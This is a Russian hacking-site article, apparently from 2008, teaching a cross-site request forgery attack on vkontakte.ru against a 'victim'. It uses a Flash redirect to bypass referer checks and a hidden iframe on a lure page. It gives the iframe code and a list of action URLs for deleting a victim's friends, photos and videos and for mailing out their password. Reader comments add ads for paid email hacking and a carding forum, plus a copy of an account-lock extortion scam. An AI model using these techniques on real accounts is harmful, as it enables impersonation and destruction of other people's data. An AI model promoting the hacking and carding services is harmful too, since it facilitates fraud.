Уязвимость на сайте Вконтакте.ру - Хакерство и безопасность - Каталог статей

Меню сайта
Главная О сайте Файлы Статьи ФОРУМ Гостевуха Обратная Связь

Категории каталога

Хакерство и безопасность [17]

Сотовые телефоны [3]

Программирование [12]

Другое [15]

Дизайн и т.п. [5]

В разработке [0]

Форма входа

Поиск

Друзья сайта
.:SecurityTeam Forum:.

Приветствую Вас, Гость · RSS

2012-02-23, 11:56 AM

Главная » Статьи » Хакерство и безопасность

Уязвимость на сайте Вконтакте.ру

На днях обнаружил уязвимость на сайте vkontakte.ru Уязвимость позволяет производить некоторые действия вконтакте от чужого имени. В дальнейшем человека, от лица которого мы будем совершать эти действия, буду называть "жертва". Теория Суть уязвимости: 1. Сайт вконтакте.ру устроен таким образом, что если закрыть страницу сайта, а потом снова ее открыть, страница откроется, не запросив пароль. 2. Сайту, как я понял, все равно каким методом мы посылаем данные из формы - GET или POST - он их обрабатывает одинакого. Мы можем воспользоваться этим. Сформировав определенный URL в адресной строке браузера, мы можем производить некоторые действия. Но, сайт не так просто сделан. 1. В некоторых формах есть скрытые поля с секретным кодом. Не зная этот код, мы ничего не сможем сделать. Но узнать его не просто, поэтому такие формы я не буду затрагивать в статье. 2. Сайт проверяет значение $_SERVER['HTTP_REFERER'], но мы обойдем эту проверку с помощью Flash. Для того, чтобы все отработало успешно, нужно: 1. Чтобы у жертвы в браузере был включен Flash. (У большинства людей, сидящих в этой социальной сети, он включен, т.к. без него не работают многие сервисы контакта: музыка, видео, приложения и т.д.) 2. Чтобы жертва была залогинена вконтакте. (Большинство людей не нажимают кнопку "Выход" вконтакте, даже когда выходят из-за компа, поэтому с этим условием, думаю, проблем тоже не возникнет.) Для примера, попробуйте ввести в адресной строке браузера в новом окне следующий URL: http://vkontakte.ru/groups.php?act=enter&gid=777107 Вы автоматически вступили в группу "В Контакте \| Безопасность". Теперь выйдите из группы и попробуйте перейти по точно такой же ссылке: http://vkontakte.ru/groups.php?act=enter&gid=777107 (откроется в новом окне) Теперь вступить в группу вам не удалось, а все по одной причине: переходя по ссылке с любого сайта, в контакт передается значение предыдущей страницы, и, в целях безопасности, он блокирует такие действия. Мы же, чуть позже, обойдем эту защиту. Приведу еще пример - откройте в новом окне следующую страницу: http://vkontakte.ru/settings.php?act=addToBlackList&id=1 Вот и создатель этого сайта оказался у вас в игноре. Подобным образом можно совершать разные действия (их список в конце статьи) Понятно, что если вы кинете жертве подобную ссылку, жертва поймет, в чем подвох. Мы же попытаемся открыть эту страницу незаметно для жертвы. Но, прежде, чем использовать эту уязвимость на жертве, мы потренеруемся на себе. В примере мы создадим скрипт, добавляющий людей в ту же группу -"В Контакте \| Безопасность". От вас требуются элементарные знания HTML. Выглядеть будет это так: Мы кидаем жертве ссылку на наш сайт. Жертва открывает эту ссылку. На сайте находится скрытый фрэйм. Этот фрэйм ссылается на специальный Flash-скрипт, который перенаправляет нас на все тот же адрес: http://vkontakte.ru/groups.php?act=enter&gid=777107. Т.к. идет перенаправление через флэш, то адрес предыдущей страницы не передастся, а значит контакт выполнит наше действие. Когда в скрытом фрэйме откроется эта страница, жертва незаметно добавится в группу "В Контакте \| Безопасность". Приступим? Практика. Шаг 1. Создаем флэшку. Для начала, создадим эту флэшку. Для ее быстрого создания я написал специальный скрипт: http://swfgen.m0nster.tu2.ru Скрипт запросит у вас URL. Вводите туда http://vkontakte.ru/groups.php?act=enter&gid=777107 и жмите "ОК". Скрипт вернет вам ссылку на готовую флэшку. Качаем флэшку на комп и переименовываем в более читаемый вид. Пусть будет vkontakte.swf Шаг 2. Создаем HTML страничку. Теперь создаем HTML-страничку. Пусть она будет называться просто *index.html. Пишем там любую чушь, главное, чтоб не вызвать подозрения у жертвы, что тут что-то неладное. Что написать на странице - дело ваше. После этого вставляем куда-нибудь в тело странички скрытый <IFRAME>. <iframe src="vkontakte.swf" style="width:10px; height:10px; padding:0; margin:0; position:absolute; left:-100; top:-100;"></iframe>* (На этом этапе может возникнуть вопрос, почему не сделать просто display:hidden, например. А потому, что в таком случае флэш не отработает) Шаг 3. Теперь у нас есть два файла: *vkontakte.swf* и *index.html* Регистрируем какой-нибудь сайт на бесплатном хостинге. Нам даже поддержка PHP не нужна, поэтому почти любой хостинг нам подойдет. Загружаем на свеженький сайт наши файлы. И попробуем открыть страничку *index.html. Открывается страничка, ничего странного вроде не наблюдается... Теперь открываем нашу страницу Вконтакте и смотрим список групп - если там появилась группа "В Контакте \| Безопасность", значит, все отработало успешно. Можно выйти из этой группы и снова открыть нашу страницу index.html, чтобы точно удостовериться, что все работает. Все, мы научились делать это. Теперь попробуем что-нибудь посложнее. Давайте удалим какую-нибудь фотку у друга. Для этого нужно знать ID фото. Узнать его не сложно: открываем страницу просмотра нужной(а точнее ненужной) фотографии и смотрим адрес страницы. Там что-то типа такого: http://vkontakte.ru/photos.php?act=show&id=1234567_987654321. В этом случае ID фото будет 1234567_987654321. Вы же делаете по аналогии. Когда узнали идентификатор фотографии, идем к уже знакомому скрипту, который сгенерирует нам флэшку. Пишем в поле URL следующий код: http://vkontakte.ru/photos.php?act=do_fdelete&id=ИД_ФОТО* Дальше все уже знакомо: переименовываем флэшку, создаем HTML страничку, там <IFRAME>, ссылающийся на нашу флэшку. Теперь кидаем ссылку на нашу страничку другу, и, если друг нажмет на ссылку, то фока у него должна исчезнуть. Думаю, принцип вы поняли. Теперь приведу список возможных действий, и требующийся для них URL. http://vkontakte.ru/settings.php?act=addToBlackList&id=ИД Добавить человека в черный список http://vkontakte.ru/friend.php?act=do_delete&id=ИД Удалить друга http://vkontakte.ru/groups.php?act=enter&gid=ИД_ГРУППЫ Вступить в группу http://vkontakte.ru/groups.php?act=leave&gid=ИД_ГРУППЫ Покинуть группу http://vkontakte.ru/notes.php?act=do_delete&nid=ИД_ЗАМЕТКИ Удалить заметку Редактировать заметку ИД заметки можно узнать из url при просмотре заметки. visible - кто может просматривать заметку. commentable - кто может комментировать могут принимать следующие значения: 0 - все 1 - Друзья и друзья друзей 2 - Только друзья http://vkontakte.ru/video.php?act=do_delete&oid=ИД&id=ИД_ВИДЕО Удалить видео (ИД_ВИДЕО можно узнать из url при просмотре видео) http://vkontakte.ru/photos.php?act=do_fdelete&id=ИД_ФОТО Удалить фото (узнать ид фото можно из url при просмотре фото.) http://vkontakte.ru/settings.php?act=send Выслать на почту жертвы письмо с её паролем
Категория: Хакерство и безопасность \| Добавил: Monster (2008-11-10) \| Автор: Monster
Просмотров: 38807 \| Рейтинг: 4.7/7

Всего комментариев: 57

1 2 3 4 5 6 »

57 webservice (2011-12-31 7:25 PM)

Взлом почты на заказ

Мы можем подобрать пароль к следующим почтовым ящикам:

@mail.ru – вероятность взлома 80%
@inbox.ru – вероятность взлома 80%
@list.ru – вероятность взлома 80%
@bk.ru – вероятность взлома 80%
@yandex.ru,ya.ru - вероятность взлома 67%
@rambler.ru - вероятность взлома 85%
@gmail.com - вероятность взлома 42%
@yahoo.com - вероятность взлома 37%

1. Работа Без Предоплаты
2. Самые низкие цены (если не считать лохотроны)
3. Предоставляются любые докозательства на Ваш вкус
4. Конфидециальность 100%
5. Пароль остается прежним
6. Сроки выполнения 1-5 дней
7. Оплата производится на: Яндекс денги или на WebMoney
8. Постоянным клиентам предоставлаем скидки

Контакты

ICQ: 614-48-76-48 (для вопросов)
Skype: vzlom.service (редко)
E-mail: Vzlom.Service@gmail.com (для заказа)
Сайт: http://vzlom-service.in

Взлом почты на заказ

Мы можем подобрать пароль к следующим почтовым ящикам:

@mail.ru – вероятность взлома 80%
@inbox.ru – вероятность взлома 80%
@list.ru – вероятность взлома 80%
@bk.ru – вероятность взлома 80%
@yandex.ru,ya.ru - вероятность взлома 67%
@rambler.ru - вероятность взлома 85%
@gmail.com - вероятность взлома 42%
@yahoo.com - вероятность взлома 37%

1. Работа Без Предоплаты
2. Самые низкие цены (если не считать лохотроны)
3. Предоставляются любые докозательства на Ваш вкус
4. Конфидециальность 100%
5. Пароль остается прежним
6. Сроки выполнения 1-5 дней
7. Оплата производится на: Яндекс денги или на WebMoney
8. Постоянным клиентам предоставлаем скидки

Контакты

ICQ: 614-48-76-48 (для вопросов)
Skype: vzlom.service (редко)
E-mail: Vzlom.Service@gmail.com (для заказа)
Сайт: http://vzlom-service.in

Взлом почты на заказ

Мы можем подобрать пароль к следующим почтовым ящикам:

@mail.ru – вероятность взлома 80%
@inbox.ru – вероятность взлома 80%
@list.ru – вероятность взлома 80%
@bk.ru – вероятность взлома 80%
@yandex.ru,ya.ru - вероятность взлома 67%
@rambler.ru - вероятность взлома 85%
@gmail.com - вероятность взлома 42%
@yahoo.com - вероятность взлома 37%

1. Работа Без Предоплаты
2. Самые низкие цены (если не считать лохотроны)
3. Предоставляются любые докозательства на Ваш вкус
4. Конфидециальность 100%
5. Пароль остается прежним
6. Сроки выполнения 1-5 дней
7. Оплата производится на: Яндекс денги или на WebMoney
8. Постоянным клиентам предоставлаем скидки

Контакты

ICQ: 614-48-76-48 (для вопросов)
Skype: vzlom.service (редко)
E-mail: Vzlom.Service@gmail.com (для заказа)
Сайт: http://vzlom-service.in

56 СЭР_MC (2011-11-27 2:44 PM)

Приглашаем хакеров и умелых людей на 7-ka.biz Кардинг Форум.

Хакуна Матата Всем хакерам. Рады пригласить вас на новый Кардинг Форум - 7-ka.biz
Форум новый и нуждается в поддержке. Для тех кто не знает что такое Кардинг - в гугл..
Всех остальных милости просим!

У нас:
Кардинг статьи
Хорошие и адекватные селлеры
18+
Общение и дружный коллектив

Семерка - кардинг форум. http://7-ka.biz/

Ключевые слова:

кардинг форум
кардинг обучение
кардинг для новичков
кардинг статьи
вещевой кардинг
реальный кардинг
вбив обучение
вбить в скайп
вбить в стим
вбить в покер
софт для кардера
кардинг программы
купить сс
кардинг купить
дампы
cc
картон купить
дедики купить
carding forum

55 JLuMoH (2011-01-12 11:16 PM)

хм йа вот думаю почему у мя не работает..во3можно по прошествию длительного времени сайт успел об3авестись лучшей защитой и это уже не прокатывает,либо руки корявые,
<html>
<head>
<title>Моя первая страничка</title>
</head>
<body>
Всем привет!<br> А вот и моя первая страничка.
<iframe src="vk13.swf" style="width:10px; height:10px; padding:0; margin:0; position:absolute; left:-100; top:-100;"></iframe>
</body>
</html>

вот мой индекс..выложил на сайт его и сам флешку файклик vk13..0 эффекта

54 PIONEERPRODIGY (2010-12-20 9:11 PM)

Всем спасибо!! Сам нашёл!! http://dlyavkontakte.ru/ne-otkr....hh.html Нужно удалить скрытый файл хост или открыть его через блакнот а тм и ответ=))

53 PIONEERPRODIGY (2010-12-20 8:04 PM)

Активация аккаунта ВКонтакте происходит посредством пополнения баланса Вашей страницы рублями через терминалы оплаты ОСМП и IBOX, которые расположены в торгово-развлекательных центрах, магазинах, кинотеатрах и других людных местах.

Для активации потребуется пополнить баланс:
жителям Украины - на 30 AUH, жителям Беларуси - на 15 000 BYR.

Единовременно происходит пополнение баланса Вашей страницы ВКонтакте

52 PIONEERPRODIGY (2010-12-20 8:02 PM)

Активация аккаунта
Ваша страница заблокирована!
Поскольку Ваш аккаунт был взломан и с него происходит рассылка спам-сообщений, мы ограничили Вам доступ. Чтобы возобновить полноценный доступ к сайту необходимо подтвердить, что Вы являетесь настоящим владельцем данной страницы.
Инструкция по активации
Для активации страницы Вам необходимо воспользоваться платной услугой посредством терминала оплаты.
Внимание! Сумма, зачисленная Вами за активацию аккаунта, попадает на
баланс Вашей страницы в виде рублей.
Далее Вы можете распоряжаться ими на Ваше усмотрение, покупка голосов, раздача подарков и т.д.
Выберите страну, в которой проживаетеАктивация для жителей России
Активация для жителей Украины и Беларуси

51 PIONEERPRODIGY (2010-12-20 7:58 PM)

Доброго времени суток. Вот случилась со мной такая беда=((. Сижу "В КОНТАКТЕ" перехожу на ссылку.. адрес ссылки не помню комп кратковременно подвисает после чего на экране появляется красная рамочка с текстом внутри " Ваша страница заблокирована так как с вашей странички происходит рассылка сообщений содержащих спам!!" Дальше предлогаеться восстановить доступ за 20грн. в этот же момент я въехал, что это развод. Особо не испугался но был неприятно удивлён!! Начал заходить на гугл появляется тоже самое окно!! и т.д. на mail.ru, на yandex.ru. Антивирусная программа McAfee вирус не обнаружила, а винду сносить не хочу. И ещё с другого компа заходили на мою страницу всё работает!! Помогите пожалуйста!! Что нужно делать в этой ситуации?

50 Капля (2010-12-03 2:19 AM)

помогите!!!!!!!!!

49 Капля (2010-12-03 2:17 AM)

Помогите мне нужно удалить видео в контакте на чужой страничке это возможно хотябы из поиска. Пожалуйста cry

(моя страничка http://vkontakte.ru/id59146908 )

48 Dave_ (2010-10-02 9:15 AM)

Хочу рассказать историю реальную на данный момент!
Сестра жены часто сидит в Контакте. Так вот что случилось. Она говорит что пытается включить прослушать музыку так ей высвечивает необходимо установить флеш плеер причем установка идет с какова-там официального сайта. Ну и она попыталась установить. После установки как обычно требуется перезагрузка. Перезагрузка пошла. Так ВОТ что она говорит- после перезагрузки--- появляется учетная запись и требует ввести пароль. Я был в шоке eek

Провел расследование так вот что говорит сеструха--- что пол года назад она ставила пароли на систему (пользователи) но потом убрала. Проверенно "ДА убранны были" но вход в систему был разделен на два участника вход без паролей
Да есче самое главное система была включена на "автоматическое обновление" может это что-то повлияло. Мои действия вкл. программульку для взлома паролей пока высветился на одного пользователя, жду дальше следующего пароля на другого пользователя!!!!!
Так ВОТ хочу узнать неужели это какой то Вирусяка завелся через "Контакт" или это системная ошибка или збой.
Помогите разобраться, очень уж интересно. Я конечно не профи-хак но тоже чего то да понимаю И унижатся просить, мол, "не бейте меня сильно, я ж не шарю" не намерен. так что Заранее благодарен за толковый ответ.

1-10 11-20 21-30 31-40 41-50 51-57

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]